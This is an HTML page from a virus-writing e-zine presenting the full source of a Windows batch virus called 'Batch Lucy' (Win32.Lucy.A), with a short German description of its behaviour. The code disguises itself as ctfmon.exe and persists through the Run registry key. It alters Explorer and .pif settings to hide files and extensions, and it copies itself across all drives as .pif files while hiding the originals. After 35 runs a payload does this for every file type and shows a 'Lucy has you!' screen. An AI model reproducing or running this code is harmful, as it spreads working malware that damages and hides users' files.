<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator" content=
"HTML Tidy for Windows (vers 14 February 2006), see www.w3.org" />
<meta http-equiv="Content-Type" content=
"text/html; charset=us-ascii" />
<title>Win32.Lucy.A</title>
<link rel="stylesheet" href="../../../css/code.css" type=
"text/css" />
</head>
<body>
<hr />
<pre>
<b>[+]</b><u>Topic: Code</u>
<b>[+]</b><u>Von: Rayden</u>
<b>[+]</b><u>Return: <a href=
"javascript:history.back()">Code</a></u>
</pre>
<hr />
<pre>
**********************
*     Batch Lucy     *
*   (c) by Rayden    *
**********************
* www.DarK-CodeZ.com *
**********************


*******************************
* Lucy Versionen und Kurzinfo *
*******************************


Lucy.A
-------

Download: DC Mag #2

- Die urspr&uuml;ngliche Datei wird-, sofern sie vorher &uuml;berschrieben wurde und existiert, ge&ouml;ffnet.
- &Uuml;berschreibt pro Start alle Dateien eines zuf&auml;lligen Dateityps, h&auml;ngt die Extension .pif an und versteckt die originale 
  Datei.

- Wird Lucy das 35. mal ausgef&uuml;hrt, &ouml;ffnet sich eine Messagebox mit dem Text "Lucy has you!" Und der Text "Lucy" erscheint 
  unten rechts neben der Uhr. Anschliessend werden alle Dateien &uuml;berschrieben, die Extension .pif angeh&auml;ngt und die 
  originale Datei versteckt.
</pre>
<hr />
<pre>
:: **********************
:: *     Batch Lucy     *
:: *   (c) by Rayden    *
:: **********************
:: * www.DarK-CodeZ.com *
:: **********************
@echo off
if "%1" == "/s" goto lucyvari
if %0 == "%~dpn0.pif" (
attrib -s -h "%~dpn0"
if exist "%~dpn0" start "%~dpn0" "%~dpn0"
attrib +s +h "%~dpn0"
)
:lucyvari
set olucy=Microsoft\Ctfmon
set dlucy=ctfmon.exe
cd /d %appdata%
mkdir "%olucy%" &gt; nul 2&gt;&amp;1
cd %olucy%
attrib -r -s -h %0 &gt; nul
if "%1" == "/s" copy %0 "%dlucy%" &gt; nul &amp; goto lucyruns
copy %0 "%dlucy%" &gt; nul
if "%errorlevel%" == "0" goto lucyopen
fc %0 "%dlucy%" &gt; nul
if "%errorlevel%" == "0" exit
goto lucyruns
:lucyopen
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "%dlucy%" /t "REG_SZ" /d "%appdata%\%olucy%\%dlucy% /s" /f &gt; nul
start "ctfmon.exe" "%appdata%\%olucy%\%dlucy%" /s
exit
:lucyruns
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t "REG_DWORD" /d "2" /f &gt; nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden" /t "REG_DWORD" /d "0" /f &gt; nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "SuperHidden" /t "REG_DWORD" /d "1" /f &gt; nul
reg add "HKCR\piffile" /ve /t "REG_SZ" /d "" /f &gt; nul
reg add "HKCR\piffile" /v "NeverShowExt" /t "REG_SZ" /d "" /f &gt; nul
reg add "HKCR\piffile" /v "InfoTip" /t "REG_SZ" /d "prop:FileDescription;Company;FileVersion;Create;Size" /f &gt; nul
reg delete "HKCR\piffile" /v "IsShortcut" /f &gt; nul
attrib -r -s -h "*.ini"
if exist "run.ini" goto lucycount
echo ^1&gt;"run.ini"
goto lucyext
:lucycount
set /p run=&lt;"run.ini"
set /a run=run+1
if "%run%" == "35" goto lucypayload
echo ^%run%&gt;"run.ini"
:lucyext
assoc&gt;temp.ini
echo /Lucy/&gt;&gt;"temp.ini"
findstr /n "^/Lucy/" "temp.ini"&gt;temp3.ini
for /f "tokens=1* delims=:" %%a in (temp3.ini) do set max=%%a
del /f /q temp3.ini
:lucy
set min=1
set /a max=max-1
echo %random% &gt; nul
set /a A=min+(max-min+1)*%random%/32768
more /e /p +%A% "temp.ini"&gt;"temp2.ini"
set /p ext=&lt;"temp2.ini"
for /f "tokens=1* delims==" %%a in ("%ext%") do set lext=%%a
for /f "tokens=1* delims=." %%a in ("%lext%") do set uext=%%a
for %%a in (C: D: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U: V: W: X: Y: Z:) do if exist "%%a\" (
cd /d %%a\
for /r %%c in (*.%uext%) do copy %0 "%%c.pif" &gt; nul
for /r %%y in (*.%uext%) do attrib +s +h "%%y" &gt; nul
)
cd /d %appdata%
cd %olucy%
del /f /q temp.ini
del /f /q temp2.ini
exit
:lucypayload
echo ^0&gt;"run.ini"
reg add "HKCU\Control Panel\International" /v "sTimeFormat" /t "REG_SZ" /d "HH:mm:ss tt" /f &gt; nul
reg add "HKCU\Control Panel\International" /v "s1159" /t "REG_SZ" /d "| Lucy" /f &gt; nul
reg add "HKCU\Control Panel\International" /v "s2359" /t "REG_SZ" /d "| Lucy" /f &gt; nul
reg add "HKCU\Console" /v "FullScreen" /t "REG_DWORD" /d "1" /f &gt; nul
cd /d %temp%
echo @echo off&gt;lucy.bat
echo title Lucy has you!&gt;&gt;lucy.bat
echo color 0C&gt;&gt;lucy.bat
echo :lucy&gt;&gt;lucy.bat
echo echo  _                       _                                   _&gt;&gt;lucy.bat
echo echo ^^^| ^^^|   _   _  ___ _   _  ^^^| ^^^|__   __ _ ___   _   _  ___  _   _^^^| ^^^|&gt;&gt;lucy.bat
echo echo ^^^| ^^^|  ^^^| ^^^| ^^^| ^^^|/ __^^^| ^^^| ^^^| ^^^| ^^^| '_ \ / _` / __^^^| ^^^| ^^^| ^^^| ^^^|/ _ \^^^| ^^^| ^^^| ^^^| ^^^|&gt;&gt;lucy.bat
echo echo ^^^| ^^^|__^^^| ^^^|_^^^| ^^^| (__^^^| ^^^|_^^^| ^^^| ^^^| ^^^| ^^^| ^^^| (_^^^| \__ \ ^^^| ^^^|_^^^| ^^^| (_) ^^^| ^^^|_^^^| ^^^|_^^^|&gt;&gt;lucy.bat
echo echo ^^^|_____\__,_^^^|\___^^^|\__, ^^^| ^^^|_^^^| ^^^|_^^^|\__,_^^^|___/  \__, ^^^|\___/ \__,_(_)&gt;&gt;lucy.bat
echo echo                  ^^^|___/                     ^^^|___/&gt;&gt;lucy.bat
echo pause ^&gt; nul&gt;&gt;lucy.bat
echo cls&gt;&gt;lucy.bat
echo goto lucy&gt;&gt;lucy.bat
start "Lucy has you!" "lucy.bat"
cd /d %appdata%
cd %olucy%
reg add "HKCU\Console" /v "FullScreen" /t "REG_DWORD" /d "0" /f &gt; nul
set A=0
assoc&gt;temp.ini
echo /Lucy/&gt;&gt;"temp.ini"
set /p ext=&lt;"temp.ini"
if "%ext%" == "/Lucy/" goto endext
goto extraext
:nextext
set /a A=A+1
more /e /p +%A% "temp.ini"&gt;"temp2.ini"
set /p ext=&lt;"temp2.ini"
if "%ext%" == "/Lucy/" goto endext
goto extraext
:extraext
for /f "tokens=1* delims==" %%a in ("%ext%") do set lext=%%a
for /f "tokens=1* delims=." %%a in ("%lext%") do set uext=%%a
for %%a in (C: D: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U: V: W: X: Y: Z:) do if exist "%%a\" (
cd /d %%a\
for /r %%c in (*.%uext%) do copy %0 "%%c.pif" &gt; nul
for /r %%y in (*.%uext%) do attrib +s +h "%%y" &gt; nul
)
cd /d %appdata%
cd %olucy%
ping -n 2 127.0.0.1 &gt; nul
goto nextext
:endext
del /f /q temp.ini
del /f /q temp2.ini
exit
:: Os iusti meditabitur sapientiam
</pre>
</body>
</html>
